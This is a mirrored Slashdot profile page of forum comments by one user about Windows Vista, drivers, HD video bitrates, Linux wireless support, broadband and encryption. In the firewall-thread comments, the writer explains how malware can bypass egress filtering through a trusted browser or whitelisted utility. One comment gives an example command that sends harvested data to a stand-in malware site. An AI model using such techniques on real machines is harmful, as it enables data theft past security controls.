Slashdot Mirror


User: julesh

julesh's activity in the archive.

Stories
0
Comments
8,446
First seen
Last seen
Profile
(view on slashdot.org)

Comments · 8,446

  1. Re:MS Windows != Every OS on Vista the Last of Its Kind · · Score: 1

    The Linux kernel allows loading of external code, including the firewall if you decide to place it externally. AFAIK, there is no comparable module-loading interface in the NTOS kernel.

  2. Re:MS Windows != Every OS on Vista the Last of Its Kind · · Score: 1

    The tools today have more features, but they're also 100 times larger (if not 1000) and run on systems with 1000 times more processor power, memory, and disk. Are you 100 times more productive? Or even twice as productive? Unless you're doing something that you simply couldn't do without a feature that didn't exist twenty years ago, I'll bet the answer is no.

    But the fact is that almost all of us are. We use Internet connections and web browsers on a daily basis, cutting the time it takes to find information we need easily by a factor of ten. We take photographs with digital cameras for immediate use in our document, cutting a task that would originally have taken multiple days while we waited for photograph processing into one that can be done in ten minutes. Those of us with a little skill can print professional-looking publications from our desktop (for all 1980s systems claimed to offer true desktop publishing, it's worth noting that only relatively recently have we reached the state where professionals and amateurs are both using the same hardware for this, even if they're not generally using the same software yet). We take data from our spreadsheets and embed it directly into our text documents, with live inter-application links so that we can use the spreadsheet software to update the original and have the resulting document automatically update.

    Now if you were to ask for a comparison against ten years ago, when software was on average twenty to thirty times smaller than today, I think you'd be more onto a winner. There's very little we do now that we couldn't do with reasonable ease ten years ago -- all that's changed is the degree of convenience.

  3. Re:MS Windows != Every OS on Vista the Last of Its Kind · · Score: 1

    many of us still see XP as a service pack to 2K, with a bit of eye candy

    And by MS's version numbering, so we should. 2K is NT 5.0; XP is NT 5.1. If this is how the engineers who numbered the version thought of it, of course it is.

    That's not to say that the improvements in XP aren't useful, many of them are. But basically they are minor improvements.

  4. Re:What a load of crap... on HD Should Be Wired, For Now · · Score: 1

    I would if I had hardware that could play 'em. :(

  5. Re:again, he's right on ESR Says Linux Followers Should Compromise · · Score: 1

    I put in an Ubuntu Live CD the other day, and without a single question I had wireless set up and working. This might even be too easy, because I was connected to someone else's open point. But their networking system operates well for me.

    Well, you're extremely lucky. For me there was a three-day-long fight to find a card which my local retailer sold which would be supported, including buying one card that was listed as supported by hardware compatibility lists, but in the end turned out to have a different chipset to the one specified in the list. There were, fortunately, open source drivers for that chipset. Unfortunately, after nearly a day of trying to make them work I still couldn't figure out what was wrong. In the end I gave up and used a dedicated wired connection to a nearby windows machine which I configured to bridge the connection.

  6. Re:again, he's right on ESR Says Linux Followers Should Compromise · · Score: 1

    Wireless is all about having the right card. I used to have this cheap-ass unsupported Belkin crap and trying to get it to work under linux was a nightmare. NDISwrapper, install this tool, that tool, blah. So I went to the wiki for my distro (Ubuntu) found the list of supported cards, bought one, and yay autodetection. No more wires under the door for me! :)

    You know what? I did exactly the same thing.

    Only when I got the card home, I found that the manufacturer had changed the chipset on the card since the hardware compatibility list had been updated with its details.

    Besides: we shouldn't have to piss around with such things. People want to go to a shop, buy the piece of hardware that looks best when they're there, come back, plug it in, and have it work. Until Linux reaches that point, its hardware compatibility will still suck.

    Every camera and music player I've ever used has automatically mounted as an external drive. Have I been abnormally lucky?

    No. Only iPods need additional software these days. This is one area where hardware manufacturers have standardised and everyone has benefited.

  7. Well, yeah. on HD Should Be Wired, For Now · · Score: 1

    I have enough trouble streaming DVD-resolution content across my 802.11g network.

    Could be something to do with using SMB as the protocol to stream it across, though. When I test my bandwidth I get a good 15Mb/s, usually, with only 3ms ping times. Dunno why everything's so slow, but it is.

  8. Re:What a load of crap... on HD Should Be Wired, For Now · · Score: 4, Insightful

    I suspect your video is rather more highly compressed than HD-DVD quality videos will be. 1920x1080p has ten times as many pixels per frame as standard DVD (720x576i) which is usually encoded at around the 9Mb/s range. The encoding of HD-DVD is better, and higher resolutions normally compress slightly better than lower ones, so I wouldn't expect to have to use 90Mb/s to reach the same quality levels... but I'd estimate 30Mb/s is necessary[1]. Sure, you can drop that to 15Mb/s for less quality loss than you get dropping DVD to 4.5Mb/s, which isn't startlingly bad. I regularly take my home-prepared DVDs lower than that, in fact. But the fact is that there is a quality loss for doing it.

    [1] - it seems that the designers of HD-DVD probably agree with this estimate: the capacity of HD-DVD is 30Gb, compared with the 9Gb capacity of DVD, so if they wanted it to support the same length video of DVD just at a higher resolution, this is what they'd have been aiming for. Blu-ray is, of course, larger still. HD-DVD is designed to cope with a maximum bitrate of 36.55Mb/s; blu-ray, again, is designed for a higher bitrate.

  9. Re:Media companies are ruining innovation on No Full HD Playback for 32-bit Vista · · Score: 1

    I'm not convinced. It's currently hard for a small system builder to source cheap components that have signed drivers in some cases, particularly for wireless network hardware (a market which seems to be dominated by devices with crappy drivers). Unless the situation improves, most of them are going to still be offering a cheap 32-bit machine at the bottom of the range. And most people seem to be buying bottom of the range machines at the moment.

  10. Re:Superiority of the Free Market. on Internet Connectivity Outside of the United States · · Score: 1

    Not only is the broadband network in England not subsidised by our taxes, our virtual-monopoly provider actively resisted the introduction of such subsidies.

  11. Re:Superiority of the Free Market. on Internet Connectivity Outside of the United States · · Score: 4, Insightful

    Yes, but conversely it is much easier to provide such services to major US cities than it is to most European cities, because US cities tend to have a higher population density.

    So how do internet access services in, say, Birmingham (3739 people per square kilometre) compare to, say, Philadelpha (4,208 per square kilometre)? The 24 megabit broadband described in TFA is available cheaply in most of Birmingham. How about Philadelphia?

  12. Re:The good news... on No Full HD Playback for 32-bit Vista · · Score: 1

    Doesn't matter.

    To run 64-bit Windows, you need every device in your PC to have a signed driver. Chances are, if you're using cheap cards (like most people are) those drivers aren't available. I doubt, for instance, that my Belkin wireless network card has a Vista-64 compatible driver. It certainly doesn't have a signed XP driver.

    You also have to accept that there's a whole load of 32-bit software that won't work with it, primarily because it isn't backwards compatible with 16-bit windows, and there's quite a bit of stuff that (surprisingly) is still using 16 bit code. Mostly application installers that want to provide a sensible error message on 16 bit windows.

    64 bit Windows isn't ready for popular use. I doubt it will be by the time Vista is released.

  13. Re:Media companies are ruining innovation on No Full HD Playback for 32-bit Vista · · Score: 1

    "Media companies are ruining innovation"... by making people embrace 64-bit technology?

    By making people run an operating system that refuses to load unsigned drivers, so that it can have a secure media path that nothing in the system is capable of intercepting before it reaches the device.

  14. Re:If it's in it's already too late on Personal Firewalls Mostly Useless, Says Mail & Guardian · · Score: 1

    "When I try that it says 'IEXPLORE.EXE is trying to access the Internet. Do you want to allow it?' What should I do?" ;)

  15. Re:It lasted a whole 10 minutes? on Personal Firewalls Mostly Useless, Says Mail & Guardian · · Score: 1

    I still remember the lone time I got virused, as it also was the lone time when I put a non-firewalled machine on the internet.

    You were probably unlucky. In the days before MSBLAST, a friend of mine was running his laptop unknowingly without a firewall, connecting to the internet daily. On the day MSBLAST was released, he got it. Realising his mistake, he brought the laptop to me, so I could perform a forensic inspection: MSBLAST was the *only* thing on the machine that shouldn't have been.

    Of course there are a few more nasties out there today, but I wouldn't be surprised to hear that a WinXP SP2 machine with no additional patches could survive for a few days at least.

  16. Re:misleading headline on Personal Firewalls Mostly Useless, Says Mail & Guardian · · Score: 1

    Software firewalls on the machine itself can do something hardware firewalls can't; it can check to see that the outbound traffic is coming from a trusted application running as an actually logged on user.

    Which is pointless when any application running on the system can just dump details of the communication they want to perform into a javascript in an html file, modify the registry parameters that might prevent internet explorer from executing the script, then run "iexplore.exe c:\malware.html" and do whatever they want with the firewall's blessing.

    Trusted processes are meaningless if the trusted process will do whatever the malware asks it to, and once you've got code running on the computer, most web browsers can be configured to do whatever you want them to.

  17. Re:misleading headline on Personal Firewalls Mostly Useless, Says Mail & Guardian · · Score: 1

    1) Web browser and javascript bugs - nothing to do with hardware or software firewalls.

    Wrong. The point is that a software firewall performing egress filtering cannot easily protect against malware that uses the browser to make its outbound connections.

    Quote:
    Browsers are particularly susceptible, since they are inherently allowed to make a connection with the internet.

    What this means is that if I get my malware running on your computer, I can (say) just run "iexplore.exe http://my.malware.site/logging-script.cgi?info=all +the+information+that+ive+harvested+from+your+mach ine". And there's nothing that a software firewall can do to stop me.

    Of course, there's little a hardware firewall can do either. Egress filtering is, in the end, a waste of everyone's time, because ultimately it is trivial for malware authors to work around. Remember when everyone was complaining that the XP firewall doesn't do egress filtering? That's actually a good thing: if it did, every bit of malware there is now would be able to work around it. As it is, much of it doesn't bother trying.

    OK, so the rest of the article is pointless, and it doesn't explain the problem very well, but what do you expect from a computer security article in the popular press?

  18. Re:misleading headline on Personal Firewalls Mostly Useless, Says Mail & Guardian · · Score: 1

    Actually, you to end with forgot ", On Windows". As you probably already know, you can set a BSD system's "securelevel" such that firewall rules, both in kernel and on disk, can't be altered without a reboot.

    Doesn't matter, unless your firewall configuration blocks access to the hosts you don't want the malware to communicate with[1] you're pretty much down to using whitelisting of processes that are allowed to communicate. In that case, all you have to do is inject the communication you want to make with the outside world into an authorised process. This is trivially easy in most circumstances. You'd just run down a list of common network utilities until you find one that's in the whitelist and which does what you want it to do.

    1: This seems very unlikely to me: pretty much the only way you'd achieve that is by whitelisting hosts you want to communicate with, and who can produce a list of all those hosts? If you get it wrong, you'll have to reboot!

  19. Re:Media companies are ruining innovation on No Full HD Playback for 32-bit Vista · · Score: 1

    I expect that most people who wind up getting Vista will get it on new computers. These new computers will most likley be 64-bit computers anyway.

    They'll have 64 bit processors, sure. But will every component in the system have a microsoft-signed driver available? 'Cause that's what you need to run Vista's 64-bit edition.

    I suspect there'll still be a lot of people running 32 bit Vista despite the fact that their machine is technically capable of running 64, because of MS's fucked up driver policy. You can guarantee I'll be on 32 bit, because it'll be impossible to run colinux on the 64-bit edition.

  20. Re:Get this. on ATI Releases Five New Radeons · · Score: 1

    That's an expensive way of getting 8 monitors.

    I'd personally be looking at 2 of the HIS PCI-e 1x ATI X1300-based cards, in combination with 2 additional 16x cards of your choice, in a typical 4 slot 2-16x, 2-1x motherboard. You'd probably ending spending half the amount on cards. Performance will be lower, I suspect, but do you really need that much performance?

  21. Re:Plural of Radeon on ATI Releases Five New Radeons · · Score: 1

    Radeonides.

  22. Re:ATI/AMD - Show leadership on ATI Releases Five New Radeons · · Score: 1

    A question: does anyone know of any recent benchmarks/comparisons made between different brands of graphics hardwore on Linux. How does the performance of Intel/VIA/NVidia with open source drive/NVidia with binary driver/ATI with open source driver/ATI with binary driver compare? What works / what doesn't with each combination? Which models are supported/which aren't?

  23. Re:Think about it as number of possibilities on Debunking a Bogus Encryption Statement? · · Score: 1

    Yes, but note that the article poster was on the right track: it comes down to file headers. Almost all consumer-grade encryption software adds headers to its encrypted output so that it can tell if it has decrypted it successfully afterwards. If this is the case, it really does break down to 2^65 (or something not a huge amount larger) because you can usually tell when your first bruteforce has succeeded.

  24. Re:Your keyspace wouldn't be that much bigger on Debunking a Bogus Encryption Statement? · · Score: 1

    I think there's more to this problem than you realize at first. Bruteforce relies on the ability to identify when you have successfully broken the cipher text.

    We're probably talking consumer encryption software here. Many such programs (most?) include a hash of the encrypted data so that they can verify that decryption was successful, or at least some other mechanism that allows them to prompt for an alternative key if the one specified didn't work. Even if there are multiple possible keys that won't produce a failure (as would happen if (e.g.) the program used a simple 8-bit checksum, which would usually provide the required property of popping up a dialog box on an incorrect key), it still dramatically reduces the search space. Maybe you're looking at 2^80 or so.

  25. Re:I wish they had evaluated it. on Microsoft License Goes to OSI But Not From Redmond · · Score: 2, Interesting

    #1...MS requires the license to USE the software. Most of the others only require the license to reproduce or modify + distribute software. They demand something, however small, just to USE the software as it's given to you. It's an EULA, not a license. Notice they think you don't have the right to even PREPARE deritive works without permission.

    These are, in fact, necessary. The GPL is an interesting license for claiming that you don't have to accept it to use the software, but it's worth noting that outside of the US, using computer software is often an act which is protected by copyright law (because a transient copy is created in RAM), so you do need a license for it. Therefore, those of us using GPL software in non-US countries have to accept the GPL in order to use. The MS license is no different in this regard, but it is explicit about it, whereas the phrasing of the GPL is actually misleading in non-US countries, and could result in people using GPL software without a license to do so (e.g. because they refuse to accept the GPL terms but don't realise that where it says you don't need to accept them doesn't apply to them). MS's lawyers are probably more internationally-minded than the FSF's are.

    You also need a license to prepare a derivitive work. Creating derivitive works is an act protected by copyright in many countries. It's good that the license grants this right.

    The rest of your analysis does make it sound like a poor license, but these things you mentioned in the first paragraph really are useful to those of us who aren't in the US.